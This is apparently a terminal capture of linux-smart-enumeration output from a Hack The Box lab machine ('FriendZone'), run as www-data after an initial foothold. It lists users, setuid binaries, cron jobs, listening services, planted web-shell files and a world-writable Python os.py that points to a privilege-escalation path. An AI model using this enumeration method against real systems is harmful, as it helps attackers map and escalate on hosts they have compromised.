root@Kali:~/HTB/Friendzone# cat lse.txt
---
If you know the current user password, write it here to check sudo privileges: ---

 LSE Version: 2.7

        User: www-data
     User ID: 33
    Password: none
        Home: /var/www
        Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
       umask: 0022

    Hostname: FriendZone
       Linux: 4.15.0-36-generic
Distribution: Ubuntu 18.04.1 LTS
Architecture: x86_64

==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
---
www-data
---
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in an administrative groups?.............. yes!
---
adm:x:4:syslog,friend
---
[*] usr030 Other users with shell.......................................... yes!
---
root:x:0:0:root:/root:/bin/bash
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
---
[i] usr040 Environment information......................................... yes!
---
SHLVL=3
OLDPWD=/home/friend
PS1=\[\]\[\]\u@\h\[\] \w \$\[\] 
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:23581
_=./lse.sh
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/sbin:/usr/sbin
INVOCATION_ID=a58e04274bd34b80be3ed3f04566b186
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
SHELL=bash
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
LS_OPTIONS=--color=auto
---
[i] usr050 Groups for other users.......................................... yes!
---
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,friend
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:friend
floppy:x:25:
tape:x:26:
sudo:x:27:
audio:x:29:
dip:x:30:friend
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:friend
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
mlocate:x:108:
uuidd:x:109:
ssh:x:110:
friend:x:1000:
lpadmin:x:111:friend
sambashare:x:112:friend
ssl-cert:x:113:
Debian-exim:x:114:
ftp:x:115:
bind:x:116:
rdma:x:117:
netdev:x:118:
---
[i] usr060 Other users..................................................... yes!
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:114::/var/spool/exim4:/usr/sbin/nologin
ftp:x:108:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
bind:x:109:116::/var/cache/bind:/usr/sbin/nologin
---
[*] usr070 PATH variables defined inside /etc.............................. yes!
---
/bin
/sbin
/usr/bin
/usr/games
/usr/local/bin
/usr/local/games
/usr/local/sbin
/usr/sbin
---
[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[*] sud040 Can we read sudoers files?...................................... nope
[*] sud050 Do we know if any other users used sudo?........................ yes!
---
friend
---
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
---
/etc/sambafiles
/etc/Development
/etc/Development/shell443.php
/etc/Development/bg.jpg
/etc/Development/bash_shell.php
/etc/Development/c.jpg
/etc/Development/shell.php
/var/spool/samba
/var/tmp
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/tmp
/tmp/linpeas.txt
/tmp/linpeas.sh
/tmp/lse.sh
/tmp/lse.txt
/tmp/tmp.0tZmnB6Svn
/tmp/tmp.frT5FTj6Vk
/run/vmware/guestServicePipe
/run/uuidd/request
/run/dbus/system_bus_socket
/run/samba/nmbd/unexpected
/run/systemd/journal/syslog
/run/systemd/journal/dev-log
/run/systemd/journal/socket
/run/systemd/journal/stdout
/run/systemd/private
/run/systemd/notify
/run/lock
/run/lock/apache2
/usr/lib/python2.7
/usr/lib/python2.7/os.py
---
[*] fst010 Binaries with setuid bit........................................ yes!
---
/bin/fusermount
/bin/umount
/bin/mount
/bin/su
/bin/ntfs-3g
/bin/ping
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/sbin/exim4
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
---
[!] fst020 Uncommon setuid binaries........................................ nope
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... yes!
---
total 36
drwxr-xr-x 5 friend friend 4096 Jan 24  2019 .
drwxr-xr-x 3 root   root   4096 Oct  5  2018 ..
lrwxrwxrwx 1 root   root      9 Jan 24  2019 .bash_history -> /dev/null
-rw-r--r-- 1 friend friend  220 Oct  5  2018 .bash_logout
-rw-r--r-- 1 friend friend 3771 Oct  5  2018 .bashrc
drwx------ 2 friend friend 4096 Oct  5  2018 .cache
drwx------ 3 friend friend 4096 Oct  6  2018 .gnupg
drwxrwxr-x 3 friend friend 4096 Oct  6  2018 .local
-rw-r--r-- 1 friend friend  807 Oct  5  2018 .profile
-rw-r--r-- 1 friend friend    0 Oct  5  2018 .sudo_as_admin_successful
-r--r--r-- 1 root   root     33 Oct  6  2018 user.txt
---
[*] fst090 SSH files in home directories................................... nope
[*] fst100 Useful binaries................................................. yes!
---
/usr/bin/dig
/bin/nc.openbsd
/bin/nc
/bin/netcat
/usr/bin/wget
---
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'www-data' have mail?...................................... nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[!] fst160 Can we write to critical files?................................. nope
[!] fst170 Can we write to critical directories?........................... nope
[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope
[!] fst190 Can we read any backup?......................................... nope
[i] fst500 Files owned by user 'www-data'.................................. yes!
---
-rw-r--r-- 1 www-data www-data 98031 Nov 13 18:36 /tmp/linpeas.txt
-rwxr-xr-x 1 www-data www-data 289968 Sep 10 16:51 /tmp/linpeas.sh
-rwxr-xr-x 1 www-data www-data 38428 Sep 12 11:56 /tmp/lse.sh
-rw-r--r-- 1 www-data www-data 10037 Nov 13 18:37 /tmp/lse.txt
-rw------- 1 www-data www-data 0 Nov 13 18:37 /tmp/tmp.0tZmnB6Svn
-rw------- 1 www-data www-data 0 Nov 13 18:37 /tmp/tmp.frT5FTj6Vk
---
[i] fst510 SSH files anywhere.............................................. nope
[i] fst520 Check hosts.equiv file and its contents......................... nope
[i] fst530 List NFS server shares.......................................... nope
[i] fst540 Dump fstab file................................................. yes!
---
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
# / was on /dev/sda1 during installation
UUID=6866a7bf-1c66-4a90-9368-cd99788a8d4a /               ext4    errors=remount-ro 0       1
/swapfile                                 none            swap    sw              0       0
---
=================================================================( system )=====
[i] sys000 Who is logged in................................................ yes!
---
 18:37:25 up  5:02,  0 users,  load average: 0.25, 0.11, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
---
[i] sys010 Last logged in users............................................ yes!
---
reboot   system boot  4.15.0-36-generi Fri Nov 13 13:34   still running
friend   pts/0        10.10.14.3       Thu Jan 24 01:20 - 01:20  (00:00)
friend   pts/0        10.10.14.3       Thu Jan 24 01:14 - 01:14  (00:00)
root     tty1                          Thu Jan 24 01:12 - down   (00:08)
reboot   system boot  4.15.0-36-generi Thu Jan 24 01:12 - 01:20  (00:08)
root     tty1                          Thu Jan 24 00:51 - down   (00:10)
root     tty1                          Thu Jan 24 00:50 - 00:51  (00:00)
root     tty1                          Thu Jan 24 00:49 - 00:50  (00:00)
reboot   system boot  4.15.0-36-generi Thu Jan 24 00:49 - 01:01  (00:12)
root     tty1                          Wed Jan 23 23:59 - down   (00:00)
reboot   system boot  4.15.0-36-generi Wed Jan 23 23:59 - 00:00  (00:00)
reboot   system boot  4.15.0-36-generi Wed Jan 23 23:58 - 23:59  (00:00)
root     tty1                          Wed Jan 23 23:43 - down   (00:14)
reboot   system boot  4.15.0-36-generi Wed Jan 23 23:42 - 23:58  (00:15)
root     pts/0        192.168.1.18     Wed Jan 16 22:00 - down   (00:14)
friend   tty1                          Wed Jan 16 21:58 - down   (00:16)
reboot   system boot  4.15.0-36-generi Wed Jan 16 21:57 - 22:14  (00:17)
root     pts/0        192.168.1.18     Tue Jan 15 21:06 - crash (1+00:50)
friend   pts/0        192.168.1.18     Tue Jan 15 21:06 - 21:06  (00:00)
friend   tty1                          Tue Jan 15 21:05 - crash (1+00:52)
reboot   system boot  4.15.0-36-generi Tue Jan 15 23:03 - 22:14  (23:10)
friend   tty1                          Wed Oct 10 18:45 - crash (97+05:18)
reboot   system boot  4.15.0-36-generi Wed Oct 10 18:44 - 22:14 (98+04:29)
root     pts/1        192.168.1.19     Wed Oct 10 02:50 - down   (00:03)
friend   pts/0        192.168.1.19     Wed Oct 10 02:48 - 02:54  (00:05)
friend   tty1                          Wed Oct 10 02:48 - down   (00:05)
reboot   system boot  4.15.0-36-generi Wed Oct 10 02:40 - 02:54  (00:14)
friend   tty1                          Mon Oct  8 19:20 - crash (1+07:19)
reboot   system boot  4.15.0-36-generi Mon Oct  8 18:32 - 02:54 (1+08:21)
friend   pts/0        192.168.130.29   Sun Oct  7 20:42 - crash  (21:50)
friend   pts/0        192.168.130.29   Sun Oct  7 20:41 - 20:41  (00:00)
friend   pts/0        192.168.130.29   Sun Oct  7 20:39 - 20:40  (00:00)
friend   pts/0        192.168.130.29   Sun Oct  7 20:33 - 20:38  (00:05)
reboot   system boot  4.15.0-36-generi Sun Oct  7 20:16 - 02:54 (2+06:37)
friend   tty1                          Sun Oct  7 18:57 - crash  (01:19)
reboot   system boot  4.15.0-36-generi Sun Oct  7 18:26 - 02:54 (2+08:27)
friend   pts/0        192.168.1.19     Sun Oct  7 03:49 - crash  (14:37)
reboot   system boot  4.15.0-36-generi Sun Oct  7 03:48 - 02:54 (2+23:05)
friend   pts/0        192.168.1.19     Sat Oct  6 12:38 - crash  (15:09)
reboot   system boot  4.15.0-36-generi Sat Oct  6 12:38 - 02:54 (3+14:16)
friend   pts/1        192.168.1.19     Sat Oct  6 01:06 - crash  (11:32)
friend   pts/0        192.168.178.1    Fri Oct  5 23:50 - 03:15  (03:24)
friend   tty1                          Fri Oct  5 23:47 - crash  (12:50)
reboot   system boot  4.15.0-36-generi Fri Oct  5 23:46 - 02:54 (4+03:07)

wtmp begins Fri Oct  5 23:46:43 2018
---
[!] sys020 Does the /etc/passwd have hashes?............................... nope
[!] sys022 Does the /etc/group have hashes?................................ nope
[!] sys030 Can we read shadow files?....................................... nope
[*] sys040 Check for other superuser accounts.............................. nope
[*] sys050 Can root user log in via SSH?................................... yes!
---
PermitRootLogin yes
---
[i] sys060 List available shells........................................... yes!
---
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash
---
[i] sys070 System umask in /etc/login.defs................................. yes!
---
UMASK		022
---
[i] sys080 System password policies in /etc/login.defs..................... yes!
---
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512
---
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... yes!
---
/usr/bin/mtr-packet = cap_net_raw+ep
---
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
---
/etc/crontab:SHELL=/bin/sh
/etc/crontab:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/crontab:17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
/etc/crontab:25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
/etc/crontab:47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
/etc/crontab:52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/etc/cron.d/popularity-contest:SHELL=/bin/sh
/etc/cron.d/popularity-contest:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/cron.d/popularity-contest:48 12 * * *   root    test -x /etc/cron.daily/popularity-contest && /etc/cron.daily/popularity-contest --crond
/etc/cron.d/php:09,39 *     * * *     root   [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi
---
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[*] ret050 Can we write to any paths present in cron jobs.................. yes!
---
/dev/null
/dev/urandom
/var/cache/apache2/mod_cache_disk
---
[!] ret060 Can we write to executable paths present in cron jobs........... nope
[i] ret400 Cron files...................................................... yes!
---
-rw-r--r-- 1 root root  722 Nov 16  2017 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Oct  6  2018 .
drwxr-xr-x 90 root root 4096 Jan 23  2019 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rw-r--r--  1 root root  712 Jan 18  2018 php
-rw-r--r--  1 root root  191 Oct  5  2018 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x  2 root root 4096 Oct  6  2018 .
drwxr-xr-x 90 root root 4096 Jan 23  2019 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root  539 Jun 27  2018 apache2
-rwxr-xr-x  1 root root 1478 Apr 20  2018 apt-compat
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x  1 root root 1176 Nov  3  2017 dpkg
-rwxr-xr-x  1 root root 4128 Jan 28  2018 exim4-base
-rwxr-xr-x  1 root root  372 Aug 21  2017 logrotate
-rwxr-xr-x  1 root root 1065 Apr  7  2018 man-db
-rwxr-xr-x  1 root root  538 Mar  1  2018 mlocate
-rwxr-xr-x  1 root root  249 Jan 25  2018 passwd
-rwxr-xr-x  1 root root 3477 Feb 21  2018 popularity-contest
-rwxr-xr-x  1 root root  383 Apr 18  2018 samba
-rwxr-xr-x  1 root root  246 Mar 21  2018 ubuntu-advantage-tools

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Oct  5  2018 .
drwxr-xr-x 90 root root 4096 Jan 23  2019 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Oct  5  2018 .
drwxr-xr-x 90 root root 4096 Jan 23  2019 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x  2 root root 4096 Oct  5  2018 .
drwxr-xr-x 90 root root 4096 Jan 23  2019 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root  723 Apr  7  2018 man-db
---
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. yes!
---
NEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Fri 2020-11-13 18:39:00 EET  1min 33s left Fri 2020-11-13 18:09:01 EET  28min ago    phpsessionclean.timer        phpsessionclean.service
Sat 2020-11-14 02:22:10 EET  7h left       Fri 2020-11-13 13:34:29 EET  5h 2min ago  apt-daily.timer              apt-daily.service
Sat 2020-11-14 02:42:31 EET  8h left       Fri 2020-11-13 14:08:14 EET  4h 29min ago motd-news.timer              motd-news.service
Sat 2020-11-14 06:29:04 EET  11h left      Fri 2020-11-13 13:34:29 EET  5h 2min ago  apt-daily-upgrade.timer      apt-daily-upgrade.service
Sat 2020-11-14 13:49:33 EET  19h left      Fri 2020-11-13 13:49:33 EET  4h 47min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2020-11-16 00:00:00 EET  2 days left   Fri 2020-11-13 13:34:29 EET  5h 2min ago  fstrim.timer                 fstrim.service
n/a                          n/a           n/a                          n/a          ureadahead-stop.timer        ureadahead-stop.service

7 timers listed.
---
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
udp    UNCONN   0        0               127.0.0.1:53            0.0.0.0:*      
tcp    LISTEN   0        10              127.0.0.1:53            0.0.0.0:*      
tcp    LISTEN   0        20              127.0.0.1:25            0.0.0.0:*      
tcp    LISTEN   0        128             127.0.0.1:953           0.0.0.0:*      
---
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... yes!
---
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.123  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:fae7  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:fae7  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:fa:e7  txqueuelen 1000  (Ethernet)
        RX packets 6665871  bytes 1419625394 (1.4 GB)
        RX errors 1809  dropped 3399  overruns 0  frame 0
        TX packets 6443865  bytes 2664596862 (2.6 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000  

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 31965  bytes 2551726 (2.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 31965  bytes 2551726 (2.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
---
[i] net510 Routing table................................................... yes!
---
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         10.10.10.2      0.0.0.0         UG    0      0        0 ens33
10.10.10.0      0.0.0.0         255.255.255.0   U     0      0        0 ens33
---
[i] net520 ARP table....................................................... yes!
---
? (10.10.10.2) at 00:50:56:b9:75:a0 [ether] on ens33
---
[i] net530 Namerservers.................................................... yes!
---
nameserver 127.0.0.53
---
[i] net540 Systemd Nameservers............................................. yes!
---
Global
          DNSSEC NTA: 10.in-addr.arpa
                      16.172.in-addr.arpa
                      168.192.in-addr.arpa
                      17.172.in-addr.arpa
                      18.172.in-addr.arpa
                      19.172.in-addr.arpa
                      20.172.in-addr.arpa
                      21.172.in-addr.arpa
                      22.172.in-addr.arpa
                      23.172.in-addr.arpa
                      24.172.in-addr.arpa
                      25.172.in-addr.arpa
                      26.172.in-addr.arpa
                      27.172.in-addr.arpa
                      28.172.in-addr.arpa
                      29.172.in-addr.arpa
                      30.172.in-addr.arpa
                      31.172.in-addr.arpa
                      corp
                      d.f.ip6.arpa
                      home
                      internal
                      intranet
                      lan
                      local
                      private
                      test

Link 2 (ens33)
      Current Scopes: DNS
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no
         DNS Servers: 8.8.8.8
                      8.8.4.4
---
[i] net550 Listening TCP................................................... yes!
---
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 10.10.10.123:53         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:25                  :::*                    LISTEN      -                   
tcp6       0      0 :::443                  :::*                    LISTEN      -                   
tcp6       0      0 :::445                  :::*                    LISTEN      -                   
tcp6       0      0 :::139                  :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
---
[i] net560 Listening UDP................................................... yes!
---
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 10.10.10.123:53         0.0.0.0:*                           -                   
udp        0      0 127.0.0.1:53            0.0.0.0:*                           -                   
udp    13824      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp    18432      0 10.10.10.255:137        0.0.0.0:*                           -                   
udp        0      0 10.10.10.123:137        0.0.0.0:*                           -                   
udp    18432      0 0.0.0.0:137             0.0.0.0:*                           -                   
udp    18560      0 10.10.10.255:138        0.0.0.0:*                           -                   
udp        0      0 10.10.10.123:138        0.0.0.0:*                           -                   
udp    18560      0 0.0.0.0:138             0.0.0.0:*                           -                   
---
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. nope
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... nope
[i] srv410 Contents of /etc/xinetd.conf.................................... nope
[i] srv420 List /etc/xinetd.d if used...................................... nope
[i] srv430 List /etc/init.d/ permissions................................... yes!
---
total 144
drwxr-xr-x  2 root root 4096 Jan 23  2019 .
drwxr-xr-x 90 root root 4096 Jan 23  2019 ..
-rwxr-xr-x  1 root root 2489 Jun 27  2018 apache-htcacheclean
-rwxr-xr-x  1 root root 8181 Jun 27  2018 apache2
-rwxr-xr-x  1 root root 4335 Mar 22  2018 apparmor
-rwxr-xr-x  1 root root 3431 Mar 23  2018 bind9
-rwxr-xr-x  1 root root 1232 Apr 19  2018 console-setup.sh
-rwxr-xr-x  1 root root 3049 Nov 16  2017 cron
-rwxr-xr-x  1 root root 2813 Nov 16  2017 dbus
-rwxr-xr-x  1 root root 6754 Jan 28  2018 exim4
-rwxr-xr-x  1 root root  985 Jul 13  2018 grub-common
-rwxr-xr-x  1 root root 3809 Feb 15  2018 hwclock.sh
-rwxr-xr-x  1 root root 2444 Oct 25  2017 irqbalance
-rwxr-xr-x  1 root root 1479 Feb 16  2018 keyboard-setup.sh
-rwxr-xr-x  1 root root 2044 Aug 15  2017 kmod
-rwxr-xr-x  1 root root 4597 Nov 25  2016 networking
-rwxr-xr-x  1 root root 1938 Apr 18  2018 nmbd
-rwxr-xr-x  1 root root 1846 Sep 10  2018 open-vm-tools
-rwxr-xr-x  1 root root 1366 Jan 17  2018 plymouth
-rwxr-xr-x  1 root root  752 Jan 17  2018 plymouth-log
-rwxr-xr-x  1 root root 1191 Jan 18  2018 procps
-rwxr-xr-x  1 root root 4355 Dec 13  2017 rsync
-rwxr-xr-x  1 root root 2864 Jan 14  2018 rsyslog
-rwxr-xr-x  1 root root 2263 Apr 18  2018 samba-ad-dc
-rwxr-xr-x  1 root root 1879 Apr 18  2018 smbd
-rwxr-xr-x  1 root root 3837 Jan 26  2018 ssh
-rwxr-xr-x  1 root root 5974 Apr 20  2018 udev
-rwxr-xr-x  1 root root 2083 Aug 15  2017 ufw
-rwxr-xr-x  1 root root 1306 May 16  2018 uuidd
-rwxr-xr-x  1 root root 2069 Aug 29  2016 vsftpd
---
[i] srv440 List /etc/rc.d/init.d permissions............................... nope
[i] srv450 List /usr/local/etc/rc.d permissions............................ nope
[i] srv460 List /etc/init/ permissions..................................... nope
[!] srv500 Can we write in systemd service files?.......................... nope
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ yes!
---
/etc/systemd/:
total 36K
drwxr-xr-x 13 root root 4.0K Jan 23  2019 system
-rw-r--r--  1 root root 1.1K Apr 20  2018 journald.conf
-rw-r--r--  1 root root 1022 Apr 20  2018 logind.conf
drwxr-xr-x  2 root root 4.0K Apr 20  2018 network
-rw-r--r--  1 root root  601 Apr 20  2018 resolved.conf
-rw-r--r--  1 root root 1.7K Apr 20  2018 system.conf
-rw-r--r--  1 root root  604 Apr 20  2018 timesyncd.conf
drwxr-xr-x  2 root root 4.0K Apr 20  2018 user
-rw-r--r--  1 root root 1.2K Jan 28  2018 user.conf

/etc/systemd/system:
total 44K
lrwxrwxrwx 1 root root    9 Jan 23  2019 networking.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jan 23  2019 open-vm-tools.service.requires
drwxr-xr-x 2 root root 4.0K Jan 23  2019 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Jan 23  2019 network-online.target.wants
lrwxrwxrwx 1 root root    9 Oct  6  2018 samba-ad-dc.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Oct  6  2018 timers.target.wants
lrwxrwxrwx 1 root root   31 Oct  5  2018 sshd.service -> /lib/systemd/system/ssh.service
drwxr-xr-x 2 root root 4.0K Oct  5  2018 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 default.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 emergency.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 sockets.target.wants
lrwxrwxrwx 1 root root   35 Oct  5  2018 syslog.service -> /lib/systemd/system/rsyslog.service
lrwxrwxrwx 1 root root   44 Oct  5  2018 dbus-org.freedesktop.resolve1.service -> /lib/systemd/system/systemd-resolved.service
drwxr-xr-x 2 root root 4.0K Oct  5  2018 getty.target.wants

/etc/systemd/system/open-vm-tools.service.requires:
total 0
lrwxrwxrwx 1 root root 34 Jan 23  2019 vgauth.service -> /lib/systemd/system/vgauth.service

/etc/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 41 Jan 23  2019 open-vm-tools.service -> /lib/systemd/system/open-vm-tools.service
lrwxrwxrwx 1 root root 38 Jan 23  2019 networking.service -> /lib/systemd/system/networking.service
lrwxrwxrwx 1 root root 32 Oct  6  2018 smbd.service -> /lib/systemd/system/smbd.service
lrwxrwxrwx 1 root root 32 Oct  6  2018 nmbd.service -> /lib/systemd/system/nmbd.service
lrwxrwxrwx 1 root root 33 Oct  6  2018 bind9.service -> /lib/systemd/system/bind9.service
lrwxrwxrwx 1 root root 34 Oct  5  2018 vsftpd.service -> /lib/systemd/system/vsftpd.service
lrwxrwxrwx 1 root root 35 Oct  5  2018 apache2.service -> /lib/systemd/system/apache2.service
lrwxrwxrwx 1 root root 31 Oct  5  2018 ssh.service -> /lib/systemd/system/ssh.service
lrwxrwxrwx 1 root root 31 Oct  5  2018 ufw.service -> /lib/systemd/system/ufw.service
lrwxrwxrwx 1 root root 38 Oct  5  2018 irqbalance.service -> /lib/systemd/system/irqbalance.service
